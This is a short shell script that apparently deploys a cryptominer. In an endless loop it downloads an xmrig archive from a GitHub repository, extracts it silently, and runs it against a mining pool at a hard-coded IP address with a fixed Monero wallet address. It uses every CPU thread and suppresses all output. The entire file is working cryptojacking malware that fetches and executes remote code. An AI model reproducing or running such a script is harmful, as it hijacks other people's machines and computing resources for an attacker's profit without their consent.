#!/bin/sh
while [ 1 ]; do
sleep 3
	wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz >/dev/null 2>&1
	./xmrig --donate-level 1 -o 137.184.109.50:443 -u 82i9fvbMSVFdU34Ph7btn9FsAvMocipLBNN17Vgf99a7CfMgt1LQzbcfN4KVZV9RD5YAMxxuw2wtJRALFM2LuYCzL8cByxD -p sd -a rx/0 -k -t $(nproc --all) >/dev/null 2>&1
	sleep 5
done
sleep 999
